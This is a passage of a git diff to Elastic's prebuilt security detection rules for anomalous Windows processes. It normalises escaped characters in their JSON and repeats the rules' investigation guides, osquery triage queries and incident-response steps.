by the `user.name` field. Is this program part of an expected workflow for the user who ran this program on this host?\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Validate if the activity has a consistent cadence (for example, if it runs monthly or quarterly), as it could be part of a monthly or quarterly business process.\n- Examine the arguments and working directory of the process. These may provide indications as to the source of the program or the nature of the tasks it is performing.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE NOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR user_account == null)\"}}\n - !{osquery{\"label\":\"Retrieve Service Unisgned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid, services.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path = authenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Related Rules\n\n- Unusual Process For a Windows Host - 6d448b96-c922-4adb-b51c-b767f1ea5b76\n- Unusual Windows Path Activity - 445a342e-03fb-42d0-8656-0367eb2dead5\n- Unusual Windows Process Calling the Metadata Service - abae61a8-c560-4dbd-acca-1e1438bff36b\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Unusual Process For a Windows Host\n\nSearching for abnormal Windows processes is a good methodology to find potentially malicious activity within a network. Understanding what is commonly run within an environment and developing baselines for legitimate activity can help uncover potential malware and suspicious behaviors.\n\nThis rule uses a machine learning job to detect a Windows process that is rare and unusual for an individual Windows host in your environment.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - If the parent process is a legitimate system utility or service, this could be related to software updates or system management. If the parent process is something user-facing like an Office application, this process could be more suspicious.\n - Investigate the process metadata \u2014 such as the digital signature, directory, etc. \u2014 to obtain more context that can indicate whether the executable is associated with an expected software vendor or package.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Consider the user as identified by the `user.name` field. Is this program part of an expected workflow for the user who ran this program on this host?\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Validate if the activity has a consistent cadence (for example, if it runs monthly or quarterly), as it could be part of a monthly or quarterly business process.\n- Examine the arguments and working directory of the process. These may provide indications as to the source of the program or the nature of the tasks it is performing.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE NOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR user_account == null)\"}}\n - !{osquery{\"label\":\"Retrieve Service Unisgned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid, services.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path = authenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Related Rules\n\n- Unusual Process For a Windows Host - 6d448b96-c922-4adb-b51c-b767f1ea5b76\n- Unusual Windows Path Activity - 445a342e-03fb-42d0-8656-0367eb2dead5\n- Unusual Windows Process Calling the Metadata Service - abae61a8-c560-4dbd-acca-1e1438bff36b\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "references": [ "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html" ], @@ -43,7 +43,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/6d8685a1-94fa-4ef7-83de-59302e7c4ca8_1.json b/packages/security_detection_engine/kibana/security_rule/6d8685a1-94fa-4ef7-83de-59302e7c4ca8_1.json index 755ff9d586a..7f791245652 100644 --- a/packages/security_detection_engine/kibana/security_rule/6d8685a1-94fa-4ef7-83de-59302e7c4ca8_1.json +++ b/packages/security_detection_engine/kibana/security_rule/6d8685a1-94fa-4ef7-83de-59302e7c4ca8_1.json @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/6d8685a1-94fa-4ef7-83de-59302e7c4ca8_2.json b/packages/security_detection_engine/kibana/security_rule/6d8685a1-94fa-4ef7-83de-59302e7c4ca8_2.json index e54fad95f80..96403e19141 100644 --- a/packages/security_detection_engine/kibana/security_rule/6d8685a1-94fa-4ef7-83de-59302e7c4ca8_2.json +++ b/packages/security_detection_engine/kibana/security_rule/6d8685a1-94fa-4ef7-83de-59302e7c4ca8_2.json @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/6d8685a1-94fa-4ef7-83de-59302e7c4ca8_3.json b/packages/security_detection_engine/kibana/security_rule/6d8685a1-94fa-4ef7-83de-59302e7c4ca8_3.json index 44891835c16..46f5467ae63 100644 --- a/packages/security_detection_engine/kibana/security_rule/6d8685a1-94fa-4ef7-83de-59302e7c4ca8_3.json +++ b/packages/security_detection_engine/kibana/security_rule/6d8685a1-94fa-4ef7-83de-59302e7c4ca8_3.json @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/6e1a2cc4-d260-11ed-8829-f661ea17fbcc_1.json b/packages/security_detection_engine/kibana/security_rule/6e1a2cc4-d260-11ed-8829-f661ea17fbcc_1.json index b7a4a052b87..a0333d02ac9 100644 --- a/packages/security_detection_engine/kibana/security_rule/6e1a2cc4-d260-11ed-8829-f661ea17fbcc_1.json +++ b/packages/security_detection_engine/kibana/security_rule/6e1a2cc4-d260-11ed-8829-f661ea17fbcc_1.json @@ -76,7 +76,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/6e1a2cc4-d260-11ed-8829-f661ea17fbcc_2.json b/packages/security_detection_engine/kibana/security_rule/6e1a2cc4-d260-11ed-8829-f661ea17fbcc_2.json index 8e22bb2baa2..fb5a80899f1 100644 --- a/packages/security_detection_engine/kibana/security_rule/6e1a2cc4-d260-11ed-8829-f661ea17fbcc_2.json +++ b/packages/security_detection_engine/kibana/security_rule/6e1a2cc4-d260-11ed-8829-f661ea17fbcc_2.json @@ -75,7 +75,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/6e1a2cc4-d260-11ed-8829-f661ea17fbcc_3.json b/packages/security_detection_engine/kibana/security_rule/6e1a2cc4-d260-11ed-8829-f661ea17fbcc_3.json index 228a5f898e0..05513d0cd18 100644 --- a/packages/security_detection_engine/kibana/security_rule/6e1a2cc4-d260-11ed-8829-f661ea17fbcc_3.json +++ b/packages/security_detection_engine/kibana/security_rule/6e1a2cc4-d260-11ed-8829-f661ea17fbcc_3.json @@ -77,7 +77,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/6e1a2cc4-d260-11ed-8829-f661ea17fbcc_4.json b/packages/security_detection_engine/kibana/security_rule/6e1a2cc4-d260-11ed-8829-f661ea17fbcc_4.json index 94ee40380d1..e96d1723276 100644 --- a/packages/security_detection_engine/kibana/security_rule/6e1a2cc4-d260-11ed-8829-f661ea17fbcc_4.json +++ b/packages/security_detection_engine/kibana/security_rule/6e1a2cc4-d260-11ed-8829-f661ea17fbcc_4.json @@ -78,7 +78,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/6e40d56f-5c0e-4ac6-aece-bee96645b172_102.json b/packages/security_detection_engine/kibana/security_rule/6e40d56f-5c0e-4ac6-aece-bee96645b172_102.json index c07963bc642..70206197a4f 100644 --- a/packages/security_detection_engine/kibana/security_rule/6e40d56f-5c0e-4ac6-aece-bee96645b172_102.json +++ b/packages/security_detection_engine/kibana/security_rule/6e40d56f-5c0e-4ac6-aece-bee96645b172_102.json @@ -15,7 +15,7 @@ "v3_windows_anomalous_process_all_hosts" ], "name": "Anomalous Process For a Windows Population", - "note": "## Triage and analysis\n\n### Investigating Anomalous Process For a Windows Population\n\nSearching for abnormal Windows processes is a good methodology to find potentially malicious activity within a network. Understanding what is commonly run within an environment and developing baselines for legitimate activity can help uncover potential malware and suspicious behaviors.\n\nThis rule uses a machine learning job to detect a Windows process that is rare and unusual for all of the monitored Windows hosts in your environment.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - If the parent process is a legitimate system utility or service, this could be related to software updates or system management. If the parent process is something user-facing like an Office application, this process could be more suspicious.\n - Investigate the process metadata \u2014 such as the digital signature, directory, etc. \u2014 to obtain more context that can indicate whether the executable is associated with an expected software vendor or package.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Consider the user as identified by the `user.name` field. Is this program part of an expected workflow for the user who ran this program on this host?\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Validate if the activity has a consistent cadence (for example, if it runs monthly or quarterly), as it could be part of a monthly or quarterly business process.\n- Examine the arguments and working directory of the process. These may provide indications as to the source of the program or the nature of the tasks it is performing.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Related Rules\n\n- Unusual Process For a Windows Host - 6d448b96-c922-4adb-b51c-b767f1ea5b76\n- Unusual Windows Path Activity - 445a342e-03fb-42d0-8656-0367eb2dead5\n- Unusual Windows Process Calling the Metadata Service - abae61a8-c560-4dbd-acca-1e1438bff36b\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Anomalous Process For a Windows Population\n\nSearching for abnormal Windows processes is a good methodology to find potentially malicious activity within a network. Understanding what is commonly run within an environment and developing baselines for legitimate activity can help uncover potential malware and suspicious behaviors.\n\nThis rule uses a machine learning job to detect a Windows process that is rare and unusual for all of the monitored Windows hosts in your environment.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - If the parent process is a legitimate system utility or service, this could be related to software updates or system management. If the parent process is something user-facing like an Office application, this process could be more suspicious.\n - Investigate the process metadata \u2014 such as the digital signature, directory, etc. \u2014 to obtain more context that can indicate whether the executable is associated with an expected software vendor or package.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Consider the user as identified by the `user.name` field. Is this program part of an expected workflow for the user who ran this program on this host?\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Validate if the activity has a consistent cadence (for example, if it runs monthly or quarterly), as it could be part of a monthly or quarterly business process.\n- Examine the arguments and working directory of the process. These may provide indications as to the source of the program or the nature of the tasks it is performing.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Related Rules\n\n- Unusual Process For a Windows Host - 6d448b96-c922-4adb-b51c-b767f1ea5b76\n- Unusual Windows Path Activity - 445a342e-03fb-42d0-8656-0367eb2dead5\n- Unusual Windows Process Calling the Metadata Service - abae61a8-c560-4dbd-acca-1e1438bff36b\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "references": [ "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html" ], @@ -34,7 +34,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -49,7 +49,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/6e40d56f-5c0e-4ac6-aece-bee96645b172_103.json b/packages/security_detection_engine/kibana/security_rule/6e40d56f-5c0e-4ac6-aece-bee96645b172_103.json index ec3c8971c01..13fae9d6791 100644 --- a/packages/security_detection_engine/kibana/security_rule/6e40d56f-5c0e-4ac6-aece-bee96645b172_103.json +++ b/packages/security_detection_engine/kibana/security_rule/6e40d56f-5c0e-4ac6-aece-bee96645b172_103.json @@ -15,7 +15,7 @@ "v3_windows_anomalous_process_all_hosts" ], "name": "Anomalous Process For a Windows Population", - "note": "## Triage and analysis\n\n### Investigating Anomalous Process For a Windows Population\n\nSearching for abnormal Windows processes is a good methodology to find potentially malicious activity within a network. Understanding what is commonly run within an environment and developing baselines for legitimate activity can help uncover potential malware and suspicious behaviors.\n\nThis rule uses a machine learning job to detect a Windows process that is rare and unusual for all of the monitored Windows hosts in your environment.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - If the parent process is a legitimate system utility or service, this could be related to software updates or system management. If the parent process is something user-facing like an Office application, this process could be more suspicious.\n - Investigate the process metadata \u2014 such as the digital signature, directory, etc. \u2014 to obtain more context that can indicate whether the executable is associated with an expected software vendor or package.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Consider the user as identified by the `user.name` field. Is this program part of an expected workflow for the user who ran this program on this host?\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Validate if the activity has a consistent cadence (for example, if it runs monthly or quarterly), as it could be part of a monthly or quarterly business process.\n- Examine the arguments and working directory of the process. These may provide indications as to the source of the program or the nature of the tasks it is performing.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSyste' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Retrieve Service Unisgned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Related Rules\n\n- Unusual Process For a Windows Host - 6d448b96-c922-4adb-b51c-b767f1ea5b76\n- Unusual Windows Path Activity - 445a342e-03fb-42d0-8656-0367eb2dead5\n- Unusual Windows Process Calling the Metadata Service - abae61a8-c560-4dbd-acca-1e1438bff36b\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Anomalous Process For a Windows Population\n\nSearching for abnormal Windows processes is a good methodology to find potentially malicious activity within a network. Understanding what is commonly run within an environment and developing baselines for legitimate activity can help uncover potential malware and suspicious behaviors.\n\nThis rule uses a machine learning job to detect a Windows process that is rare and unusual for all of the monitored Windows hosts in your environment.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - If the parent process is a legitimate system utility or service, this could be related to software updates or system management. If the parent process is something user-facing like an Office application, this process could be more suspicious.\n - Investigate the process metadata \u2014 such as the digital signature, directory, etc. \u2014 to obtain more context that can indicate whether the executable is associated with an expected software vendor or package.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Consider the user as identified by the `user.name` field. Is this program part of an expected workflow for the user who ran this program on this host?\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Validate if the activity has a consistent cadence (for example, if it runs monthly or quarterly), as it could be part of a monthly or quarterly business process.\n- Examine the arguments and working directory of the process. These may provide indications as to the source of the program or the nature of the tasks it is performing.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSyste' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Retrieve Service Unisgned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Related Rules\n\n- Unusual Process For a Windows Host - 6d448b96-c922-4adb-b51c-b767f1ea5b76\n- Unusual Windows Path Activity - 445a342e-03fb-42d0-8656-0367eb2dead5\n- Unusual Windows Process Calling the Metadata Service - abae61a8-c560-4dbd-acca-1e1438bff36b\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, 